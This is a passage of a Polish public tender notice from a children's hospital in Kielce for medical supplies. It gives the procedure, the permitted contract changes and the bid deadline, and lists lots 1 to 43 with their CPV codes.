b) Jeżeli oferta wspólna złożona przez dwóch lub więcej wykonawców zostanie wyłoniona w prowadzonym postępowaniu jako najkorzystniejsza przed podpisaniem umowy w sprawie zamówienia publicznego, Zamawiający zażąda w wyznaczonym terminie złożenia umowy regulującej współpracę tych Wykonawców, podpisanej przez wszystkich partnerów.
c) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy, a pełnomocnictwo/ upoważnienie do pełnienia takiej funkcji wystawione zgodnie z wymogami ustawowymi, podpisane przez prawnie upoważnionych przedstawicieli każdego z Wykonawców, winno być dołączone do oferty.
d) Oferta winna zawierać wszystkie dokumenty, oświadczenia i informacje wymienione w rozdziale VI, ust.8 pkt: b); ust.9 pkt: a), b), c)  dla każdego partnera z osobna, pozostałe składane są wspólnie.
e) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają możliwość zmiany umowy w następującym zakresie:
1)konieczność zmiany wynika z okoliczności, których nie dało się przewidzieć w dacie zawarcia umowy,
2)Zmiany osób przedstawionych w ofercie przetargowej do  realizacji umowy, jeżeli zmiana tych osób stanie stanie się konieczna z przyczyn niezależnych od Sprzedającego (Wykonawcy) 
3)Zmiany osób, jeżeli  Kupujący (Zamawiający) uzna, że nie wykonują należycie swoich obowiązków
4)zmiany przywoływanych w przedmiotowej umowie ustaw oraz rozporządzeń, w przypadku uchwalenia nowych ustaw lub rozporządzeń mających odpowiednie zastosowanie,  zmiany przepisów których regulacje wpływają na prawa i obowiązki stron
5)zmiana korzystna dla Kupującego
6)zmiany terminu wykonania przedmiotu zamówienia (terminu rozpoczęcia i zakończenia), w sytuacji gdyby wystąpiły okoliczności powodujące, że wykonanie zamówienia nie jest możliwe do wykonania w terminie, o którym mowa w SIWZ, z przyczyn leżących po stronie Wykonawcy (Sprzedającego) i Zamawiającego (Kupującego), przedłużenia się procedury przetargowej, 
7)zmiany numeru konta, o którym mowa w § 4 umowy,
8)ograniczenia zakresu przedmiotu zamówienia,
9)obniżenia wynagrodzenia, o którym mowa w § 1,
10)zmiany o charakterze niezależnym od stron, którego strony nie mogły przewidzieć przed zawarciem umowy, urzędowa zmiana stawek podatku VAT,  z uwagi na niezależne od stron okoliczności tj. choroba, wypadki losowe, nieprzewidziane zmiany organizacyjne, dotyczące osób reprezentujących strony, zmiana banków, zmiany danych teleadresowych zapisanych w umowie, zmiany lub innej istotnej zmiany w ilości jakiegokolwiek elementu prac objętych umową, zmiany wymogów szczególnych zaistnienie okoliczności leżących po stronie Zamawiającego (Kupującego), w szczególności spowodowanych warunkami organizacyjnymi,
11)wielkości i liczby opakowań w przypadku zmiany sposobu konfekcjonowania towaru bądź zapotrzebowania Szpitala (Kupujący dopuszcza zmiany umowy w zakresie sposobu konfekcjonowania przedmiotu zamówienia, liczby opakowań pod warunkiem, że przeliczona ilość  z załącznika pakiet  pozostanie nie zmieniona)
12) Zamiany numeru kat. produktu w przypadku: wycofania z obrotu, wstrzymania produkcji, zaprzestania produkcji przedmiotu zamówienia (udokumentowanej) z oferty, dopuszczając produkt zamienny pod warunkiem, że będzie on spełniał wszystkie parametry opisane przez Kupującego, zmiana po akceptacji przez Kupującego(Zamawiającego).
13)zmiany organizacyjne / strukturalne / własnościowe formy prawnej / przekształcenia po stronie Zamawiającego, w szczególności związane z przekształceniem, o którym mowa w ustawie z dnia 15 kwietnia 2011 r. o działalności leczniczej (Dz. U.2013.217 j. t.) oraz innych stosowanych przepisach,
14)Zmiana warunków umowy wymaga formy pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chok.kielce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Specjalistyczny Szpital Dziecięcy im. Władysława Buszkowskiego, ul. Langiewicza 2, 25-381 Kielce, Pawilon A, Dział ds. Przetargów i Zaopatrzenia, pokój nr 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.03.2014 godzina 10:00, miejsce: Wojewódzki Specjalistyczny Szpital Dziecięcy im. Władysława Buszkowskiego, ul. Langiewicza 2, 25-381 Kielce, Pawilon A, Dział ds. Przetargów i Zaopatrzenia, pokój nr 22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Strzykawki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Strzykawki szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.13.10-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Igły.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Igły szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.13.20-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Łyżki laryngoskopowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Łyżki laryngoskopowe szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.20.00-3, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Papiery i żele do EKG, USG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Papiery i żele do EKG, USG szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przyrządy do przetaczania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przyrządy do przetaczania szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Worki do dobowej zbiórki moczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Worki do dobowej zbiórki moczu szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 44.61.90.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Elektrody holterowskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elektrody holterowskie szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Przyrządy do aspiracji butelek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przyrządy do aspiracji butelek szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Trenażer oddechowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trenażer oddechowy szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Cewniki dreny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cewniki dreny szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.12.40-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Rurki intubacyjne, prowadnice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rurki intubacyjne, prowadnice.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.12.40-4, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Osłona na opakowania z lekami.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Osłona na opakowania z lekami szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8, 44.61.90.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Płyny do myjni dezynfektora.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Płyny do myjni dezynfektora szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.95.00.00-8, 24.96.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Uniwersalne woreczki na mocz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uniwersalne woreczki na mocz szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 44.61.90.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Maty przeciw kurzowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Maty przeciw kurzowe szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Preparaty do chirurgicznego mycia rąk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparaty do chirurgicznego mycia rąk szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.71.19.00-6, 24.95.00.00-8, 24.96.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Detergenty enzymatyczne do ręcznego mycia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Detergenty enzymatyczne do ręcznego mycia szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.95.00.00-8, 24.96.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Ostrza chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ostrza chirurgiczne szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.20.00-3, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pianka do mycia noworodków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pianka do mycia noworodków szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.71.19.00-6, 24.95.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Osprzęt do pomp infuzyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Osprzęt do pomp infuzyjnych szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Elektrody noworodkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elektrody noworodkowe szczegółowo opisano w załączniku do speyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Przyrządy do pomp Plum A.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przyrządy do pomp Plum A szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Cewniki Trokar, cewniki typu Prymicat.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cewniki Trokar, cewniki typu Prymicat szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.12.40-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Igły do punkcji lędźwiowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Igły do punkcji lędźwiowej szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.13.20-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Igły do biopsji szpiku kostnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Igły do biopsji szpiku kostnego szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.13.20-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Strzykawki 50ml.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Strzykawki 50ml szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.13.10-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Kapturki 1x użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kapturki 1x użytku szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Nożyki alergologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nożyki alergologiczne szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Szew pętlowy endoskopowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szew pętlowy endoskopowy szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Igły do trepanobiopsji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Igły do trepanobiopsji szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.13.20-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Testy do oznaczania chlorku w pocie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Testy do oznaczania chlorku w pocie szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.96.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Czyścik do elektrokoagulacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czyścik do elektrokoagulacji szczegółowo opisano w załaczniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> Zestaw PEG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw PEG szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8, 33.16.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 34 <b>NAZWA:</b> Zestaw PEG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw PEG szczegółowo opisano w załaczniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8, 33.16.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 35 <b>NAZWA:</b> Zestaw PEG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw PEG szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8, 33.16.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 36 <b>NAZWA:</b> Testy do myjni dezynfektora.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Testy do myjni dezynfektora szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.96.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 37 <b>NAZWA:</b> Staplery i endostaplery.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Staplery i endostaplery szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.20.00-3, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 38 <b>NAZWA:</b> Filtry do płynów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filtry do płynów szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 39 <b>NAZWA:</b> Wymiennik ciepła i wilgoci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiennik ciepła i wilgoci szczegółowo opisano w załaczniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 40 <b>NAZWA:</b> Staza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Staza szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 41 <b>NAZWA:</b> Zgłębnik do żywienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgłębnik do żywienia szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.12.40-4, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 42 <b>NAZWA:</b> Cewniki tlenowe donosowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cewniki tlenowe donosowe szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.12.40-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 43 <b>NAZWA:</b> Zestaw do badania ucha.</p>
